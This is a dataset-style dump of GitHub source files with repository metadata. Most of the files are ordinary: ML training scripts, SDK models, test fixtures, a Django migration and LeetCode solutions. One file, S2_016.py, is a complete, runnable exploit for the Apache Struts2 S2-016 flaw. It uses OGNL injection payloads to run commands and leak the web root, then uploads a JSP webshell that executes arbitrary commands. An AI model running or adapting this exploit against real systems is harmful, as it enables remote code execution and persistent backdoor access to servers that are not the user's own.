blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
65235dd521308b51b04aee202f4a2e28bd864484 | 2a5d8aafddf6744b8ec5a025a1b908878a56d59d | /examples/voc/train_fcn16s.py | 9c935715746c66f95eccf3a69ac092c5df8fd147 | [] | no_license | mrteera/pytorch-fcn | 030e50657b48a4d43d02c8f0b1020ba15248b3db | 449f92a26beb6bbd423e6fefce896ec96c944e16 | refs/heads/master | 2021-08-20T02:32:48.063375 | 2017-11-28T01:23:12 | 2017-11-28T01:23:12 | 112,288,341 | 2 | 0 | null | 2017-11-28T05:05:08 | 2017-11-28T05:05:08 | null | UTF-8 | Python | false | false | 3,067 | py | #!/usr/bin/env python
import argparse
import os
import os.path as osp
import torch
import torchfcn
from train_fcn32s import get_log_dir
from train_fcn32s import get_parameters
configurations = {
# same configuration as original work
# https://github.com/shelhamer/fcn.berkeleyvision.org
1: dict(
max_iteration=100000,
lr=1.0e-12,
momentum=0.99,
weight_decay=0.0005,
interval_validate=4000,
fcn32s_pretrained_model=torchfcn.models.FCN32s.download(),
)
}
here = osp.dirname(osp.abspath(__file__))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-g', '--gpu', type=int, required=True)
parser.add_argument('-c', '--config', type=int, default=1,
choices=configurations.keys())
parser.add_argument('--resume', help='Checkpoint path')
args = parser.parse_args()
gpu = args.gpu
cfg = configurations[args.config]
out = get_log_dir('fcn16s', args.config, cfg)
resume = args.resume
os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu)
cuda = torch.cuda.is_available()
torch.manual_seed(1337)
if cuda:
torch.cuda.manual_seed(1337)
# 1. dataset
root = osp.expanduser('~/data/datasets')
kwargs = {'num_workers': 4, 'pin_memory': True} if cuda else {}
train_loader = torch.utils.data.DataLoader(
torchfcn.datasets.SBDClassSeg(root, split='train', transform=True),
batch_size=1, shuffle=True, **kwargs)
val_loader = torch.utils.data.DataLoader(
torchfcn.datasets.VOC2011ClassSeg(
root, split='seg11valid', transform=True),
batch_size=1, shuffle=False, **kwargs)
# 2. model
model = torchfcn.models.FCN16s(n_class=21)
start_epoch = 0
start_iteration = 0
if resume:
checkpoint = torch.load(resume)
model.load_state_dict(checkpoint['model_state_dict'])
start_epoch = checkpoint['epoch']
start_iteration = checkpoint['iteration']
else:
fcn32s = torchfcn.models.FCN32s()
fcn32s.load_state_dict(torch.load(cfg['fcn32s_pretrained_model']))
model.copy_params_from_fcn32s(fcn32s)
if cuda:
model = model.cuda()
# 3. optimizer
optim = torch.optim.SGD(
[
{'params': get_parameters(model, bias=False)},
{'params': get_parameters(model, bias=True),
'lr': cfg['lr'] * 2, 'weight_decay': 0},
],
lr=cfg['lr'],
momentum=cfg['momentum'],
weight_decay=cfg['weight_decay'])
if resume:
optim.load_state_dict(checkpoint['optim_state_dict'])
trainer = torchfcn.Trainer(
cuda=cuda,
model=model,
optimizer=optim,
train_loader=train_loader,
val_loader=val_loader,
out=out,
max_iter=cfg['max_iteration'],
interval_validate=cfg.get('interval_validate', len(train_loader)),
)
trainer.epoch = start_epoch
trainer.iteration = start_iteration
trainer.train()
if __name__ == '__main__':
main()
| [
"www.kentaro.wada@gmail.com"
] | www.kentaro.wada@gmail.com |
cc835a2e423f86342cc8680a183f393ecf36c646 | 78a15793be1ba71ea7eecee33abef4ecbe11d8f2 | /apps/tasks/migrations/0007_task_prototype.py | 8aaf0c000b7bb98be1e6a4e5e5a008f2ba9330e0 | [] | no_license | teresaylin/my2009 | f5df9c62492d4c88931f6aa45af31ee88dbe3a1a | 2486750ad73df313d596497b0eb7f4c47518e6a6 | refs/heads/master | 2021-03-21T23:53:55.581074 | 2016-06-01T18:13:44 | 2016-06-01T18:13:44 | 23,392,283 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('tasks', '0006_auto_20150112_1549'),
]
operations = [
migrations.AddField(
model_name='task',
name='prototype',
field=models.ForeignKey(blank=True, null=True, to='tasks.Task', related_name='prototype_for'),
preserve_default=True,
),
]
| [
"jam.hann@gmail.com"
] | jam.hann@gmail.com |
bc5605235c47c590538bf12a1da25091b2f5baa9 | fc1c1e88a191b47f745625688d33555901fd8e9a | /meraki_sdk/models/update_network_switch_link_aggregation_model.py | ae44c5120556a9d79b3eaa75edadd21fd9fcaf0c | [
"MIT",
"Python-2.0"
] | permissive | RaulCatalano/meraki-python-sdk | 9161673cfd715d147e0a6ddb556d9c9913e06580 | 9894089eb013318243ae48869cc5130eb37f80c0 | refs/heads/master | 2022-04-02T08:36:03.907147 | 2020-02-03T19:24:04 | 2020-02-03T19:24:04 | 416,889,849 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,722 | py | # -*- coding: utf-8 -*-
"""
meraki_sdk
This file was automatically generated for meraki by APIMATIC v2.0 ( https://apimatic.io ).
"""
import meraki_sdk.models.switch_port_model
import meraki_sdk.models.switch_profile_port_model
class UpdateNetworkSwitchLinkAggregationModel(object):
"""Implementation of the 'updateNetworkSwitchLinkAggregation' model.
TODO: type model description here.
Attributes:
switch_ports (list of SwitchPortModel): Array of switch or stack ports
for updating aggregation group. Minimum 2 and maximum 8 ports are
supported.
switch_profile_ports (list of SwitchProfilePortModel): Array of switch
profile ports for updating aggregation group. Minimum 2 and
maximum 8 ports are supported.
"""
# Create a mapping from Model property names to API property names
_names = {
"switch_ports":'switchPorts',
"switch_profile_ports":'switchProfilePorts'
}
def __init__(self,
switch_ports=None,
switch_profile_ports=None):
"""Constructor for the UpdateNetworkSwitchLinkAggregationModel class"""
# Initialize members of the class
self.switch_ports = switch_ports
self.switch_profile_ports = switch_profile_ports
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
switch_ports = None
if dictionary.get('switchPorts') != None:
switch_ports = list()
for structure in dictionary.get('switchPorts'):
switch_ports.append(meraki_sdk.models.switch_port_model.SwitchPortModel.from_dictionary(structure))
switch_profile_ports = None
if dictionary.get('switchProfilePorts') != None:
switch_profile_ports = list()
for structure in dictionary.get('switchProfilePorts'):
switch_profile_ports.append(meraki_sdk.models.switch_profile_port_model.SwitchProfilePortModel.from_dictionary(structure))
# Return an object of this model
return cls(switch_ports,
switch_profile_ports)
| [
"api-pm@meraki.com"
] | api-pm@meraki.com |
c1cc6d515458baffe471b2ce6885e3399146a037 | b095173b2dbc77c8ad61c42403258c76169b7a63 | /tests/unit/sagemaker/feature_store/feature_processor/test_data_helpers.py | a539c1b8d0e12b36adf3caff9af1e6c6a5a997de | [
"Apache-2.0"
] | permissive | aws/sagemaker-python-sdk | 666665e717cfb76698ba3ea7563b45344634264d | 8d5d7fd8ae1a917ed3e2b988d5e533bce244fd85 | refs/heads/master | 2023-09-04T01:00:20.663626 | 2023-08-31T15:29:19 | 2023-08-31T15:29:19 | 110,621,895 | 2,050 | 1,255 | Apache-2.0 | 2023-09-14T17:37:15 | 2017-11-14T01:03:33 | Python | UTF-8 | Python | false | false | 5,596 | py | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
# language governing permissions and limitations under the License.
from __future__ import absolute_import
import datetime
import json
from dateutil.tz import tzlocal
from sagemaker.feature_store.feature_processor._data_source import (
CSVDataSource,
FeatureGroupDataSource,
)
from sagemaker.feature_store.feature_processor._enums import FeatureProcessorMode
from sagemaker.feature_store.feature_processor._feature_processor_config import (
FeatureProcessorConfig,
)
INPUT_S3_URI = "s3://bucket/prefix/"
INPUT_FEATURE_GROUP_NAME = "input-fg"
INPUT_FEATURE_GROUP_ARN = "arn:aws:sagemaker:us-west-2:12345789012:feature-group/input-fg"
INPUT_FEATURE_GROUP_S3_URI = "s3://bucket/input-fg/"
INPUT_FEATURE_GROUP_RESOLVED_OUTPUT_S3_URI = (
"s3://bucket/input-fg/feature-store/12345789012/"
"sagemaker/us-west-2/offline-store/input-fg-12345/data"
)
FEATURE_GROUP_DATA_SOURCE = FeatureGroupDataSource(name=INPUT_FEATURE_GROUP_ARN)
S3_DATA_SOURCE = CSVDataSource(s3_uri=INPUT_S3_URI)
FEATURE_PROCESSOR_INPUTS = [FEATURE_GROUP_DATA_SOURCE, S3_DATA_SOURCE]
OUTPUT_FEATURE_GROUP_ARN = "arn:aws:sagemaker:us-west-2:12345789012:feature-group/output-fg"
FEATURE_GROUP_SYSTEM_PARAMS = {
"feature_group_name": "input-fg",
"online_store_enabled": True,
"offline_store_enabled": False,
"offline_store_resolved_s3_uri": None,
}
SYSTEM_PARAMS = {"system": {"scheduled_time": "2023-03-25T02:01:26Z"}}
USER_INPUT_PARAMS = {
"some-key": "some-value",
"some-other-key": {"some-key": "some-value"},
}
DESCRIBE_FEATURE_GROUP_RESPONSE = {
"FeatureGroupArn": INPUT_FEATURE_GROUP_ARN,
"FeatureGroupName": INPUT_FEATURE_GROUP_NAME,
"RecordIdentifierFeatureName": "id",
"EventTimeFeatureName": "ingest_time",
"FeatureDefinitions": [
{"FeatureName": "id", "FeatureType": "String"},
{"FeatureName": "model", "FeatureType": "String"},
{"FeatureName": "model_year", "FeatureType": "String"},
{"FeatureName": "status", "FeatureType": "String"},
{"FeatureName": "mileage", "FeatureType": "String"},
{"FeatureName": "price", "FeatureType": "String"},
{"FeatureName": "msrp", "FeatureType": "String"},
{"FeatureName": "ingest_time", "FeatureType": "Fractional"},
],
"CreationTime": datetime.datetime(2023, 3, 29, 19, 15, 47, 20000, tzinfo=tzlocal()),
"OnlineStoreConfig": {"EnableOnlineStore": True},
"OfflineStoreConfig": {
"S3StorageConfig": {
"S3Uri": INPUT_FEATURE_GROUP_S3_URI,
"ResolvedOutputS3Uri": INPUT_FEATURE_GROUP_RESOLVED_OUTPUT_S3_URI,
},
"DisableGlueTableCreation": False,
"DataCatalogConfig": {
"TableName": "input_fg_1680142547",
"Catalog": "AwsDataCatalog",
"Database": "sagemaker_featurestore",
},
},
"RoleArn": "arn:aws:iam::12345789012:role/role-name",
"FeatureGroupStatus": "Created",
"OnlineStoreTotalSizeBytes": 12345,
"ResponseMetadata": {
"RequestId": "d36d3647-1632-4f4e-9f7c-2a4e38e4c6f8",
"HTTPStatusCode": 200,
"HTTPHeaders": {
"x-amzn-requestid": "d36d3647-1632-4f4e-9f7c-2a4e38e4c6f8",
"content-type": "application/x-amz-json-1.1",
"content-length": "1311",
"date": "Fri, 31 Mar 2023 01:05:49 GMT",
},
"RetryAttempts": 0,
},
}
PIPELINE = {
"PipelineArn": "some_pipeline_arn",
"RoleArn": "some_execution_role_arn",
"CreationTime": datetime.datetime(2023, 3, 29, 19, 15, 47, 20000, tzinfo=tzlocal()),
"PipelineDefinition": json.dumps(
{
"Steps": [
{
"RetryPolicies": [
{
"BackoffRate": 2.0,
"IntervalSeconds": 1,
"MaxAttempts": 5,
"ExceptionType": ["Step.SERVICE_FAULT", "Step.THROTTLING"],
},
{
"BackoffRate": 2.0,
"IntervalSeconds": 1,
"MaxAttempts": 5,
"ExceptionType": [
"SageMaker.JOB_INTERNAL_ERROR",
"SageMaker.CAPACITY_ERROR",
"SageMaker.RESOURCE_LIMIT",
],
},
]
}
]
}
),
}
def create_fp_config(
inputs=None,
output=OUTPUT_FEATURE_GROUP_ARN,
mode=FeatureProcessorMode.PYSPARK,
target_stores=None,
enable_ingestion=True,
parameters=None,
):
"""Helper method to create a FeatureProcessorConfig with fewer arguments."""
return FeatureProcessorConfig.create(
inputs=inputs or FEATURE_PROCESSOR_INPUTS,
output=output,
mode=mode,
target_stores=target_stores,
enable_ingestion=enable_ingestion,
parameters=parameters,
)
| [
"noreply@github.com"
] | aws.noreply@github.com |
c8dcd1cedd1d97b890b8d2a3f6acf93613e18b7a | 09df89395816834ddf77de620f959c22e74d8c00 | /HashTable/IntersectionOfTwoArrays.py | c9236cc4818230a0b857c950f279ebbd7dea479b | [] | no_license | gdh756462786/Leetcode_by_python | c853c4e3de255a8b4016c59944a0d40213a539a7 | 6387543a2a23c30aef1d5d37db54ca72cfb19270 | refs/heads/master | 2020-06-22T11:53:24.758506 | 2018-12-28T03:03:31 | 2018-12-28T03:03:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,543 | py | # -*- coding: utf-8 -*-
'''
Given two arrays, write a function to compute their intersection.
Example:
Given nums1 = [1, 2, 2, 1], nums2 = [2, 2], return [2, 2].
'''
class Solution(object):
def intersect(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: List[int]
"""
nums1.sort()
nums2.sort()
result = []
while nums1 and nums2:
if nums2[0] == nums1[0]:
result.append(nums2.pop(0))
nums1.pop(0)
else:
if nums2[0] > nums1[0]:
nums1.pop(0)
else:
nums2.pop(0)
return result
'''
方法二
class Solution(object):
def intersect(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: List[int]
"""
count = {}
res = []
for item in nums1:
if item not in count:
count[item] = [1, 0]
else:
count[item][0] += 1
for item in nums2:
if item in count:
count[item][1] +=1
for key in count:
if count[key][0] * count[key][1] > 0:
for i in range(min(count[key][0], count[key][1])):
res.append(key)
return res
'''
'''
Test:
nums1 = [1,2,2,1]
nums2 = [2,2]
'''
solution = Solution()
nums1 = [1,2,2,1]
nums2 = [2,2]
res = solution.intersect(nums1, nums2)
print res | [
"pengshuang92@163.com"
] | pengshuang92@163.com |
e2b08af0cf472fba90e20de63c2f33fe20f598d9 | 2a45af8ec8a4c87d544f461d27795a283f8f5f67 | /python/termcolor.py | d653691bc187a1bbfe10735a28e6d377d5049fb5 | [] | no_license | fengidri/python-script | 2199a16a2d0cc76e6055aec31aaced4638a8c86d | 28fb8e6dbf9e6ba5a1f9c4c3d7b635212bfc5b66 | refs/heads/master | 2020-04-05T14:04:55.103302 | 2017-04-27T10:32:27 | 2017-04-27T10:32:27 | 8,678,963 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,235 | py | class termcolor:
def __init__(self):
self.color_switch = True
def on(self):
self.color_switch = True
def off(self):
self.color_switch = False
def black(self,s): return self.__color(30, s)
def red(self,s): return self.__color(31, s)
def green(self,s): return self.__color(32, s)
def yellow(self,s): return self.__color(33, s)
def blue(self,s): return self.__color(34, s)
def purple(self,s): return self.__color(35, s)
def white(self,s): return self.__color(37, s)
def __color(self, color_int, s):
if self.color_switch:
return "%s[%d;2m%s%s[0m" %(chr(27), color_int, s, chr(27))
else:
return s
def highlight(self,s):
if self.color_switch:
return "%s[30;2m%s%s[1m"%(chr(27), s, chr(27))
else:
return s
def __color(color_int, s):
return "%s[%d;2m%s%s[0m" %(chr(27), color_int, s, chr(27))
def black(s): return __color(30, s)
def red(s): return __color(31, s)
def green(s): return __color(32, s)
def yellow(s): return __color(33, s)
def blue(s): return __color(34, s)
def purple(s): return __color(35, s)
def white(s): return __color(37, s)
| [
"fengidri@gmail.com"
] | fengidri@gmail.com |
1cd7062e2dbbc857e50079a192f844d5b55ed6a5 | 350ecc8259bcad075bd376423335bb41cc8a533e | /container.py | d6f4dabc91f6cd2c71ee5bbf7a890d63b568db65 | [] | no_license | CodedQuen/python_begin | 39da66ecc4a77b94a5afbbf0900727c8156b85e1 | 1433c319b5d85520c50aee00dd4b6f21a7e6366a | refs/heads/master | 2022-06-10T10:30:28.807874 | 2020-04-25T03:34:03 | 2020-04-25T03:34:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 276 | py | class Container(Object):
def __init__(self):
super(Container, self).__init__()
self._count = 0
def purge(self):
pass
purge = abstractmethod(purge)
def __iter__(self):
pass
__iter__ = abstractmethod(__iter__)
| [
"noreply@github.com"
] | CodedQuen.noreply@github.com |
96324744aa7dddbf82ee6d0e7ad929195f6382f3 | 3db5e39d9bbe1c86229a26e7d19e3ceb37f902e3 | /Baekjoon/DFS/11403_경로찾기.py | 428e02133b0c4846feee49fd309f8023c6f0c0a1 | [] | no_license | sweetrain096/rain-s_python | 5ca2fe5e7f97a681b6e75e64264687a723be1976 | eb285eb50eeebfaa2b4a4d7816314e2073faab00 | refs/heads/master | 2021-07-19T16:06:01.389283 | 2020-05-29T14:56:16 | 2020-05-29T14:56:16 | 162,240,216 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | py | import sys
sys.stdin = open("11403_input.txt")
def dfs(node):
global cnt
if cnt:
visited[node] = 1
cnt += 1
for i in range(n):
if graph[node][i] and not visited[i]:
dfs(i)
n = int(input())
graph = []
for i in range(n):
graph.append(list(map(int, input().split())))
for row in range(n):
visited = [0 for _ in range(n)]
cnt = 0
dfs(row)
print(' '. join(map(str, visited)))
| [
"gpfhddl09@gmail.com"
] | gpfhddl09@gmail.com |
aafa2d25bda177feee0ba3861452ed094d4d6d30 | 80760d4c8a6b2c45b4b529bdd98d33c9c5509438 | /Practice/atcoder/ABC/055/src/c.py | 581f1048d011740a10f93f59ac009b0225db5863 | [] | no_license | prrn-pg/Shojin | f1f46f8df932df0be90082b475ec02b52ddd882e | 3a20f1122d8bf7d95d9ecd205a62fc36168953d2 | refs/heads/master | 2022-12-30T22:26:41.020473 | 2020-10-17T13:53:52 | 2020-10-17T13:53:52 | 93,830,182 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | # sはありったけ使うほうがいい(cから作るとコストがかかる)
# ありったけ = m//2
# 残ったcからsccを作るには4つ必要
n, m = map(int, input().split())
c = min(n, m // 2)
c += max(0, (m-2*n) // 4)
print(c)
| [
"hjod1172@yahoo.co.jp"
] | hjod1172@yahoo.co.jp |
7373d5b736b485909f5bd2f9492763ddb0046a15 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_connivance.py | 4c54eff01815f5dbf6ca736af9a0c9732235da69 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py |
#calss header
class _CONNIVANCE():
def __init__(self,):
self.name = "CONNIVANCE"
self.definitions = [u'the act of conniving, especially by knowing that something bad is happening and allowing it to continue: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
c9781bbdb2daf299479b46c56664e6961bb2de0e | a3d72c9d47a3711ff1a7213da25bacdcb3a7aa32 | /stickerfinder/models/__init__.py | 060f44f521a3886e9ed3f2fb27f318cbfea89f87 | [
"MIT"
] | permissive | crashcoredump/sticker-finder | 225a46c586d1b2b8764cf325e296186cbece5edd | 8158724ebc3e8346012d0ede05a75bb8f9f5f7eb | refs/heads/master | 2020-08-26T23:28:56.991893 | 2019-10-23T22:34:58 | 2019-10-23T22:34:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 788 | py | from stickerfinder.models.chat import Chat, chat_sticker_set # noqa
from stickerfinder.models.sticker import Sticker, sticker_tag # noqa
from stickerfinder.models.task import Task # noqa
from stickerfinder.models.sticker_set import StickerSet # noqa
from stickerfinder.models.tag import Tag # noqa
from stickerfinder.models.user import User # noqa
from stickerfinder.models.change import Change, change_added_tags, change_removed_tags # noqa
from stickerfinder.models.report import Report # noqa
from stickerfinder.models.inline_query import InlineQuery # noqa
from stickerfinder.models.inline_query_request import InlineQueryRequest # noqa
from stickerfinder.models.sticker_usages import StickerUsage # noqa
from stickerfinder.models.proposed_tags import ProposedTags # noqa
| [
"arne@twobeer.de"
] | arne@twobeer.de |
db0ceb7dc61955a38e418bdd38b7e2bbb30d7b57 | c3b66b2f374722acda9747e8c0759ec7aed7e367 | /flask/app/plugins/Struts2/S2_016.py | 788428d7ee3f5c29ee61681f8c4b92562e011671 | [] | no_license | LubyRuffy/linbing | 743965f6e658e476da011ae3a91a91c8466ff977 | b9fb2358955f19629b96ae753cd8811e8d89a862 | refs/heads/master | 2021-02-19T18:24:32.890527 | 2020-03-04T06:18:46 | 2020-03-04T06:18:46 | 245,317,758 | 1 | 0 | null | 2020-03-06T03:02:42 | 2020-03-06T03:02:41 | null | UTF-8 | Python | false | false | 6,166 | py | #!/usr/bin/env python3
'''
name: Struts2 S2-016漏洞,又名CVE-2013-2251漏洞
description: Struts2 S2-016漏洞可执行任意命令
'''
import os
import re
import json
import time
import urllib
import string
import random
import requests
from urllib import request, parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class S2_016_BaseVerify:
def __init__(self, url):
self.url = url
self.capta=''
words=''.join((string.ascii_letters,string.digits))
for i in range(8):
self.capta = self.capta + random.choice(words)
self.headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 115Browser/6.0.3",
'Content-Type': "application/x-www-form-urlencoded",
'Connection': "keep-alive",
}
self.check_payload = '''?redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27''' + 'echo' + ' ' + self.capta + '''%27%29.getInputStream%28%29%29%7D'''
self.cmd_payload = '''?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{'whoami'}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}'''
self.path_payload = '''?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28"%2F"%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D'''
self.jsp_payload = """
<%
if("cmd".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
"""
def get_pagecode(self, url):
req = requests.get(url = url, verify = False)
return req
def upload_jspshell(self, url, path):
webshellpath = "'" + path + '/' + "/test.jsp" + "'"
Headers = {'ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','User-Agent' : 'Mozilla/5.0 (compatible; Indy Library)'}
payload = "?redirect:${%23path%3d"
payload += webshellpath
payload += ",%23file%3dnew+java.io.File(%23path),%23file.createNewFile(),%23buf%3dnew+char[50000],%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest').getReader().read(%23buf),%23out%3dnew+java.io.BufferedWriter(new+java.io.FileWriter(%23file)),%23str%3dnew+java.lang.String(%23buf),%23out.write(%23str.trim()),%23out.close(),%23stm%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23stm.getWriter().println("
payload += '"' + path + '/test.jsp' + '+Get Shell!!!"'
payload += "),%23stm.getWriter().flush(),%23stm.getWriter().close()}"
url += payload
try:
req = requests.post(url, data = self.jsp_payload, headers = Headers, timeout = 10, allow_redirects = False, verify = False)
if req.text.find('<html') == -1:
print('上传webshell文件成功,webshell文件路径为:', self.url.split('/')[0] + '//' + self.url.split('/')[2] + '/test.jsp')
else:
return 'Fail.....>_<'
except Exception as e:
return str(e)
def filter(self, check_str):
temp = ''
for i in check_str:
if i != '\n' and i != '\x00':
temp = temp + i
return temp
def run(self):
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
if '.action' not in self.url:
self.url = self.url + '/index.action'
check_req = self.get_pagecode(self.url + self.check_payload)
check_str = self.filter(list(check_req.text))
try:
if self.capta in check_str:
cmd_req = self.get_pagecode(self.url + self.cmd_payload)
cmd_str = self.filter(list(cmd_req.text))
print('存在S2-016漏洞,执行whoami命令成功,执行结果为:', cmd_str)
path_req = self.get_pagecode(self.url + self.path_payload)
if path_req.status_code == 200:
print('存在S2-016漏洞,获取网站文件路径成功,结果为:', path_req.text)
self.upload_jspshell(self.url, "".join(path_req.text.split()))
return True
else:
print('不存在S2-016漏洞!')
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == "__main__":
s2_016 = S2_016_BaseVerify('http://192.168.30.242:8080')
s2_016.run()
| [
"taomujian@protonmail.com"
] | taomujian@protonmail.com |
6b2320e8c2c47715ea5c98b27735c8f33d211d9e | 369e260e100db9ab5cc8b1711e99ef5e49aec173 | /ml/m04_xor4_keras.py | 87fe064f010eff90ddc713569ba5716aa45af154 | [] | no_license | HWALIMLEE/study | 7aa4c22cb9d7f7838634d984df96eed75f7aefea | 8336adc8999126258fe328d6b985a48e32667852 | refs/heads/master | 2023-03-26T09:11:19.606085 | 2021-03-29T23:03:04 | 2021-03-29T23:03:04 | 259,555,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,983 | py | from sklearn.svm import SVC
from sklearn.metrics import accuracy_score
from sklearn.neighbors import KNeighborsClassifier, KNeighborsRegressor
from keras.layers import Dense
from keras. models import Sequential
import numpy as np
#머신러닝에서는 그냥 하면 되는데
#딥러닝은 np.array로 변경
#딥러닝은 가중치의 곱의 합
#행렬 곱, 행렬 연산 잘하기 위해
#list는 appending될 뿐-->연산 자체가 안 이루어진다.
#머신러닝은 가중치 연산이 아니다. 따라서 리스트도 가능하다
#labelencoder
#1.데이터
x_data=[[0,0],[1,0],[0,1],[1,1]]
y_data=[0,1,1,0]
x_data=np.array(x_data)
print(x_data)
y_data=np.array(y_data)
print("x_data.shape",x_data.shape) #(4,2)
print("y_data.shape:",y_data.shape) #(4,)
#2.모델
# model=LinearSVC()
# model=SVC()
# lin = LinearSVC()
# sv = SVC()
# kn = KNeighborsClassifier(n_neighbors=1)
model=Sequential()
#n_neighbors 작을수록 더 치밀
#데이터가 적을수록 n_neighbors 적게 하는 것이 좋다
#각 개체를 한개씩만 연결하겠다
model.add(Dense(10,input_dim=2,activation='relu')) #input과 아웃풋 #딥러닝 아님
model.add(Dense(30,activation='relu'))
model.add(Dense(20,activation='relu'))
model.add(Dense(10,activation='relu'))
model.add(Dense(1,activation='sigmoid')) #마지막에만 시그모이드
#output dimension=1
#3.실행
model.compile(optimizer='adam',metrics=['acc'],loss='binary_crossentropy') #metrics는 결과만 보는 것
model.fit(x_data,y_data,epochs=100,batch_size=1)
loss,acc=model.evaluate(x_data,y_data)
#accuracy는 1이 나올 수 없다, 선형으로는 절대 나올 수 없쥐
#4.평가예측
x_test = [[0,0],[1,0],[0,1],[1,1]]
x_test=np.array(x_test)
y_predict = model.predict(x_test)
# acc=accuracy_score([0,1,1,0],y_predict)
#그냥 score는 evaluate와 동일한 것
#evaluate대신 score사용
# acc2=accuracy_score([0,1,1,0],y_predict)
print(x_test,"의 예측 결과:",y_predict)
print("acc=",acc) | [
"hwalim9612@gmail.com"
] | hwalim9612@gmail.com |
